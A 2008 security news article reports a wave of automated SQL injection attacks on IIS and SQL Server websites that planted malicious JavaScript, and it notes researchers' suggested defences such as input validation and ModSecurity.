[ insider_reports_insider ]
SQL Injection Hitting Numerous Websites
David Utter
Staff Writer
2008-01-10
 Insider Reports RSS Feed
Web applications have long been targeted when injection flaws could be exploited, with one automated bot stepping up its injection attacks.
 | | SQL Injection Hitting Numerous Websites |  |
In November 2007, the SANS ISC noted some instances of what appeared to be automated attacks against websites, where SQL injection served as the attack vector. The attack primarily targeted sites running on Microsoft IIS, with SQL Server operating on the back end.
ISC's Bojan Zdrnja wrote at ISC Incidents about the return of the automated SQL injection attacker, on a wider scale. It appears thousands of sites have been compromised by the attacker.
According to Ryan Barnett at ModSecurity, the attack is similar to the one that affected the Dolphin Stadium website before the last Super Bowl. Upwards of 70,000 websites have been compromised by this newest attack, which SANS blames on poorly secured web applications.
Barnett said the attack tries to inject malicious JavaScript into all the varchar and text fields of the database. The JavaScript then attempts to infect website visitors by exploiting unpatched browser vulnerabilities, likely to drop malware onto the system.
Web applications that aren't validating input due to poor coding by their programmers put the site and its visitors at risk. Zdrnja thinks that the people behind the attack will expand their bot to target sites using PHP and MySQL, another popular combination for web applications online.
Barnett suggested using Apache as a reverse proxy server as a front end to the application server. With ModSecurity and its Core Rules in place on the reverse proxy, Barnett said the SQL injection attack as documented would not have succeeded.
About the Author:
David Utter is a business and technology writer for SecurityProNews and WebProNews.
More insider_reports_insider Articles
Insider Reports RSS Feed
|
|
iEntry 10th Anniversary
RSS
Archive
